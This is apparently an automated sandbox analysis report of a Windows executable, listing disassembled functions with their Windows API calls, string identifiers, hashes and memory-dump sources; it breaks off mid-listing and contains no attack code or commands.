                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 176399719-4108050209
                                                                                                                                                        • Opcode ID: 8476f7c414f05dcd4c5afee905dc9dedba03d104136f20b5dbeb3a28b1deed0e
                                                                                                                                                        • Instruction ID: 4cacd6525c8e505eda44a3de60ef162a2b3ade8fb592c59d17d2e846f37098bd
                                                                                                                                                        • Opcode Fuzzy Hash: 8476f7c414f05dcd4c5afee905dc9dedba03d104136f20b5dbeb3a28b1deed0e
                                                                                                                                                        • Instruction Fuzzy Hash: 6E413775A00209EFDB21EFA8D844BEA7BB6FF49314F244428FA4597351DB30A910CF61
                                                                                                                                                        Function 00ADEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00ADEC1E
                                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00ADEC94
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00ADEC9E
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00ADED0B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                                                        • Opcode ID: ceca9bb656bae5d68b19c6f60713b7a562798751d238b5b83a83e45d50558ab6
                                                                                                                                                        • Instruction ID: b50fe1ed9d7f8d2d94a44bb2ea18a5337ad8c0ab39bb06b9b487170e7c0ae41f
                                                                                                                                                        • Opcode Fuzzy Hash: ceca9bb656bae5d68b19c6f60713b7a562798751d238b5b83a83e45d50558ab6
                                                                                                                                                        • Instruction Fuzzy Hash: 46319E35A00209AFCB10EB64C989AAEB7F4EF44B10F148067F502EF3A1DA719A41CBD1
                                                                                                                                                        Function 00ACC6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00ACC782
                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00ACC78D
                                                                                                                                                        • GetParent.USER32 ref: 00ACC7A9
                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ACC7AC
                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00ACC7B5
                                                                                                                                                        • GetParent.USER32(?), ref: 00ACC7D1
                                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ACC7D4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                                                        • Opcode ID: 5b137b1d04c1890251839d7a3f012b1d2ca0ca1bbaa9290f6886c7c8c10e610c
                                                                                                                                                        • Instruction ID: 63740fff61a59554118d9803afd497935f8058d54aeaad6255095481bdc7d1e0
                                                                                                                                                        • Opcode Fuzzy Hash: 5b137b1d04c1890251839d7a3f012b1d2ca0ca1bbaa9290f6886c7c8c10e610c
                                                                                                                                                        • Instruction Fuzzy Hash: ED21AF74A00208BFDF05EBA4CC86EFEBBB5EB46310F504119F566972E1DB785916AB20
                                                                                                                                                        Function 00ACC7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00ACC869
                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00ACC874
                                                                                                                                                        • GetParent.USER32 ref: 00ACC890
                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ACC893
                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00ACC89C
                                                                                                                                                        • GetParent.USER32(?), ref: 00ACC8B8
                                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ACC8BB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                                                        • Opcode ID: 6a09a5c97f307cd820b13bc2d429f685eb2faf59b5ca5c2a766329880e21b063
                                                                                                                                                        • Instruction ID: 02794cf67fc9f8ab2fe32ac8574ae2678dce43bf9106b468fae473ba6e743480
                                                                                                                                                        • Opcode Fuzzy Hash: 6a09a5c97f307cd820b13bc2d429f685eb2faf59b5ca5c2a766329880e21b063
                                                                                                                                                        • Instruction Fuzzy Hash: CE21B071A00208BBDF01EBA4CC85EFEBBB9EF45310F504015F515E72E1DB789915AB20
                                                                                                                                                        Function 00ACC8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetParent.USER32 ref: 00ACC8D9
                                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00ACC8EE
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ACC900
                                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00ACC97B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                        • API String ID: 1704125052-3381328864
                                                                                                                                                        • Opcode ID: eca7bca95153244d755dfb9b155fadbb4be794f69a0542ea068e784fc9defa5e
                                                                                                                                                        • Instruction ID: fa6ea9d3fb0c5dab7cd67da321fe6a7456cff3343933d157856e6ad381381498
                                                                                                                                                        • Opcode Fuzzy Hash: eca7bca95153244d755dfb9b155fadbb4be794f69a0542ea068e784fc9defa5e
                                                                                                                                                        • Instruction Fuzzy Hash: 9811E976648312B9FA052B30DC0AEE677ECDF07774B61005AF908E60E2FF716A026654
                                                                                                                                                        Function 00ADB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00ADB137
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ArraySafeVartype
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1725837607-0
                                                                                                                                                        • Opcode ID: e6d59b2b083804188ca67f71ea1fb4a04363eb36fb530750c1629c889e5c5cf1
                                                                                                                                                        • Instruction ID: a826a09614dfb13b65a468ef1ddd06f5d8c9b23671317aa40dd66b9ade1d659a
                                                                                                                                                        • Opcode Fuzzy Hash: e6d59b2b083804188ca67f71ea1fb4a04363eb36fb530750c1629c889e5c5cf1
                                                                                                                                                        • Instruction Fuzzy Hash: 18C17E75A1121ADFDB04CF98D481BEEB7B4FF08315F21406AE616EB351D734AA81DBA0
                                                                                                                                                        Function 00ABBA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __lock.LIBCMT ref: 00ABBA74
                                                                                                                                                          • Part of subcall function 00AB8984: __mtinitlocknum.LIBCMT ref: 00AB8996
                                                                                                                                                          • Part of subcall function 00AB8984: RtlEnterCriticalSection.NTDLL(00AB0127), ref: 00AB89AF
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00ABBA85
                                                                                                                                                          • Part of subcall function 00AB7616: __calloc_impl.LIBCMT ref: 00AB7625
                                                                                                                                                          • Part of subcall function 00AB7616: Sleep.KERNEL32(00000000,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB763C
                                                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00ABBAA0
                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00B46990,00000064,00AB6B14,00B467D8,00000014), ref: 00ABBAF9
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00ABBB44
                                                                                                                                                        • GetFileType.KERNEL32(00000001), ref: 00ABBB8B
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00ABBBC4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1426640281-0
                                                                                                                                                        • Opcode ID: 6a9c74766cc741eda1130059fe2e4e9da7cda262bf468be42d3591625abc25c7
                                                                                                                                                        • Instruction ID: 70a69582ad58ebcdb363194ce2bef5f20e5846287a86c35b4746afa129c54898
                                                                                                                                                        • Opcode Fuzzy Hash: 6a9c74766cc741eda1130059fe2e4e9da7cda262bf468be42d3591625abc25c7
                                                                                                                                                        • Instruction Fuzzy Hash: CD81B4719157458FDB14CF68C8806EDBBF8BF4A324B64425DD4A6AB3D2CBB49802CB64
                                                                                                                                                        Function 00AD7212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __swprintf.LIBCMT ref: 00AD7226
                                                                                                                                                        • __swprintf.LIBCMT ref: 00AD7233
                                                                                                                                                          • Part of subcall function 00AB234B: __woutput_l.LIBCMT ref: 00AB23A4
                                                                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AD725D
                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00AD7269
                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00AD7276
                                                                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00AD7296
                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00AD72A8
                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00AD72B7
                                                                                                                                                        • LockResource.KERNEL32(?), ref: 00AD72C3
                                                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AD7322
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1433390588-0
                                                                                                                                                        • Opcode ID: d4c58d2161cb31d2105fc82053ec13e2b6acb1288e734fa717d6cffafb703012
                                                                                                                                                        • Instruction ID: f615c46d8f7db0c112ea039bf40e9c9bf05e0fddd1a598e43a21df6294e391cc
                                                                                                                                                        • Opcode Fuzzy Hash: d4c58d2161cb31d2105fc82053ec13e2b6acb1288e734fa717d6cffafb703012
                                                                                                                                                        • Instruction Fuzzy Hash: 2B31AD7190425AABCB059F61DC89AFF7BA9FF08301B048426FD12D7250EB34DA50DAA0
                                                                                                                                                        Function 00AD4A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AD4A7D
                                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4A91
                                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00AD4A98
                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AA7
                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AD4AB9
                                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AD2
                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AE4
                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4B29
                                                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4B3E
                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4B49
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                                        • Opcode ID: b713b0c1c97c9be767c1db7a6d2cb3788cfdb68ce6b351f58260cbf31bcd4bf2
                                                                                                                                                        • Instruction ID: 4cbea96c8d089531668907c66aaad1cf9c8b22fee60108447e9d5537852866cb
                                                                                                                                                        • Opcode Fuzzy Hash: b713b0c1c97c9be767c1db7a6d2cb3788cfdb68ce6b351f58260cbf31bcd4bf2
                                                                                                                                                        • Instruction Fuzzy Hash: 6731BF75600304AFEB119F14DC89BA977E9AB58796F54801BF90AD73A0DBB4DD408F60
                                                                                                                                                        Function 00B0EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetClientRect.USER32(?), ref: 00B0EC32
                                                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B0EC49
                                                                                                                                                        • GetWindowDC.USER32(?), ref: 00B0EC55
                                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00B0EC64
                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00B0EC76
                                                                                                                                                        • GetSysColor.USER32(00000005), ref: 00B0EC94
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 272304278-0
                                                                                                                                                        • Opcode ID: 7e0e86542b3988d08e5b157ed06520203918892f767227258790dfdb6d4dc888
                                                                                                                                                        • Instruction ID: 89e0a89df93b5b87b842ad6471c8cf5e659b669d184c1c803fd764fa2875342f
                                                                                                                                                        • Opcode Fuzzy Hash: 7e0e86542b3988d08e5b157ed06520203918892f767227258790dfdb6d4dc888
                                                                                                                                                        • Instruction Fuzzy Hash: 3A212C31500205FFEB21AB74EC49BE97FB5EB05321F908665FA26A60E2DF314A51DF21
                                                                                                                                                        Function 00ACD978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • EnumChildWindows.USER32(?,00ACDD46), ref: 00ACDC86
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
